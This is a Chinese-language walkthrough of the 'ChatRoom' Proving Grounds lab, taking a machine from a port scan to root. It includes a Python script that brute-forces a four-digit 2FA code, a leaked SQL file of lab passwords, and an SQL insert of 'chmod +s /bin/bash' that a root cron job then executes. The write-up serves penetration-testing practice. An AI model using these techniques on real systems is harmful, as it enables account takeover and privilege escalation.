ChatRoom pg walkthrough Intermediate

NMAP

┌──(root㉿kali)-[~/lab]
└─# nmap -p- -A 192.168.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 00:22 UTC
Nmap scan report for 192.168.189.110
Host is up (0.073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Chat Room
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   72.32 ms 192.168.45.1
2   72.15 ms 192.168.45.254
3   73.03 ms 192.168.251.1
4   76.67 ms 192.168.189.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.45 seconds

只有22 和80 那看來突破口就是80了 訪問80 發現是個登入介面嘗試admin admin 發現登入不上 

dirsearch

[00:25:08] Starting: 
[00:25:16] 403 -  280B  - /.htaccess.bak1                                   
[00:25:16] 403 -  280B  - /.ht_wsr.txt                                      
[00:25:16] 403 -  280B  - /.htaccess.save                                   
[00:25:16] 403 -  280B  - /.htaccess.orig
[00:25:16] 403 -  280B  - /.htaccess.sample
[00:25:16] 403 -  280B  - /.htaccess_sc
[00:25:16] 403 -  280B  - /.htaccess_orig
[00:25:16] 403 -  280B  - /.htaccessBAK                                     
[00:25:16] 403 -  280B  - /.htaccessOLD2                                    
[00:25:16] 403 -  280B  - /.htaccess_extra                                  
[00:25:16] 403 -  280B  - /.htaccessOLD
[00:25:16] 403 -  280B  - /.htm
[00:25:16] 403 -  280B  - /.htpasswd_test                                   
[00:25:16] 403 -  280B  - /.htpasswds
[00:25:16] 403 -  280B  - /.html                                            
[00:25:16] 403 -  280B  - /.httr-oauth                                      
[00:25:17] 403 -  280B  - /.php                                             
[00:25:19] 301 -  315B  - /js  ->  http://192.168.189.110/js/               
[00:25:23] 302 -    0B  - /admin.php  ->  index.php                         
[00:25:34] 302 -    0B  - /chat.php  ->  index.php                          
[00:25:36] 301 -  316B  - /css  ->  http://192.168.189.110/css/             
[00:25:43] 301 -  319B  - /images  ->  http://192.168.189.110/images/       
[00:25:43] 200 -  457B  - /images/                                          
[00:25:45] 200 -  511B  - /js/                                              
[00:25:47] 302 -    0B  - /login.php  ->  index.php                         
[00:26:00] 403 -  280B  - /server-status                                    
[00:26:00] 403 -  280B  - /server-status/
[00:26:00] 200 -    2KB - /setup.sql               

發現了很有意思的檔案 setup.sql

檢視這個sql檔案發現了許多密碼和使用者

CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT UNIQUE NOT NULL,
    password TEXT NOT NULL,
    is_admin INTEGER NOT NULL
);

CREATE TABLE password_resets (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL,
    token TEXT NOT NULL,
    FOREIGN KEY(user_id) REFERENCES users(id)
);

CREATE TABLE two_factor_tokens (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL,
    token TEXT NOT NULL,
    FOREIGN KEY(user_id) REFERENCES users(id)
);

CREATE TABLE comments (
    id INTEGER PRIMARY KEY,
    user TEXT NOT NULL,
    text TEXT NOT NULL,
    is_admin INTEGER NOT NULL
);

CREATE TABLE hooks (
    id INTEGER PRIMARY KEY,
    code TEXT,
    backup BOOLEAN NOT NULL DEFAULT 0
);

INSERT INTO users (username, password, is_admin) VALUES
('mrjones', 'L1k3ARo11!ngSt0ne', 0),
('louise', 'T@mb0ur1neMan1965', 0),
('johanna', 'H0wD0es1tFeel?', 0),
('ramona', 'T1mes@reCh@ng1ng', 0),
('maggie', 'L@yin+heW1nd$1963', 0),
('adm_robertz', 'J0k3r$Th1ef&Qeen', 1);

INSERT INTO comments (user, text, is_admin) VALUES
('mrjones', 'Hello everyone! Excited to be here.', 0),
('louise', 'Welcome, mrjones! This is a great place to learn.', 0),
('johanna', 'Does anyone know how to reset the password?', 0),
('ramona', 'Yes, johanna, you can go to the "Forgot Password" link on the login page.', 0),
('adm_robertz', 'Remember to follow the community guidelines. Happy chatting!', 1),
('maggie', 'Thanks for the reminder, adm_robertz!', 0),
('johanna', 'Got it, thanks ramona!', 0),
('louise', 'If anyone needs help, feel free to ask.', 0),
('mrjones', 'What are some good resources to start with?', 0);

INSERT INTO hooks (id, code, backup) VALUES (1, 'touch timestamp.txt', 0);

嘗試用hydra直接ssh登入看看能不能登入上

發現不太行

那就登入web進去看看吧
('adm_robertz', 'J0k3r$Th1ef&Qeen', 1); 感覺這個使用者應該是admin使用者就先登入這個看看

我擦他還有二次驗證

我們先不管這玩意 先嚐試能不能訪問到之前dirsearch掃到的頁面
發現成功了

發現這裡有個很有意思的東西 chat hooks 估計是聊天時會觸發的命令
但問題又來了 我們好像沒有他的二次驗證碼就登入不進去 就觸發不了

又發現了一個比較有意思的地方

在忘記密碼一欄輸入使用者名稱 他會返回一個token
沒有用

直接爆破吧因為他是四位數的驗證碼
我們可以直接爆破

寫了個簡陋的指令碼

import requests

for i in range(0,9000):
    code=1000

    cookies = {
        'PHPSESSID': 'jdcg3a4b8335ms7jkrqsm517i9',
    }

    headers = {
        'Host': '192.168.189.110',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        # 'Accept-Encoding': 'gzip, deflate, br',
        'Content-Type': 'application/x-www-form-urlencoded',
        # 'Content-Length': '12',
        'Origin': 'http://192.168.189.110',
        'Connection': 'close',
        'Referer': 'http://192.168.189.110/2fa.php',
        'Upgrade-Insecure-Requests': '1',
        # 'Cookie': 'PHPSESSID=jdcg3a4b8335ms7jkrqsm517i9',
    }

    data = '2fa_code='+str(code+i)

    response = requests.post('http://192.168.189.110/2fa.php', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False)

    print(response.status_code)
    if(response.status_code==302 or response.status_code=="302"):
        print("code :::::::",code+i);
        break

然後登入成功

然後我們觸發hooks

發現成功反彈shell

登入後發現有個使用者dylan 而且又ssh 秘鑰 我們直接利用該秘鑰ssh登入該使用者

檢視定時任務發現可疑任務

點選檢視程式碼

dylan@chatroom:/tmp$ cat /var/backups/backup.sh 
#!/bin/bash
BACKUP_SCRIPT="/var/backups/backup.sh"
CRON_FILE="/etc/cron.d/backup_cron"
BACKUP_DIR="/var/backups"
w="/var/www/html"
b="/var/backups"
mkdir -p $b
cp $w/chatroom.db $b/b.db

eQ="U0VMRUNUIGNvZGUgRlJPTSBob29rcyBXSEVSRSBiYWNrdXAgPSAxIEFORCAoaWQgSVMgTk9UIE5VTEwpIE9SREVSIEJZIGlkIERFU0MgTElNSVQgMTs="
c=$(echo "$eQ" | base64 --decode | sqlite3 $b/b.db)
ip4='\b((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\b'
ip6='\b([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b|\b([0-9a-fA-F]{1,4}:){1,7}:|\b:([0-9a-fA-F]{1,4}:){1,6}[0-9a-fA-F]{1,4}\b'
echo "$c" | grep -qE "$ip4|$ip6" || eval "$c"dylan@chatroom:/tmp$ 

base64解碼看看這句話是啥意思

檢視執行這條語句的查詢結果 發現並沒有符合條件的結果

同時我們發現

他有可能會直接eval c的內容
嘗試插入惡意資料

發現這個db檔案沒有寫入許可權

再看看他的指令碼 發現這個b.db 是複製 /var/www/html的 這就好辦了 因為我們有 /var/www/html/backup.sh寫入許可權

插入惡意命令
echo "insert into hooks ('code','backup') values('chmod +s /bin/bash',1)" | sqlite3 /var/www/html/chatroom.db

等待定時任務執行

提權成功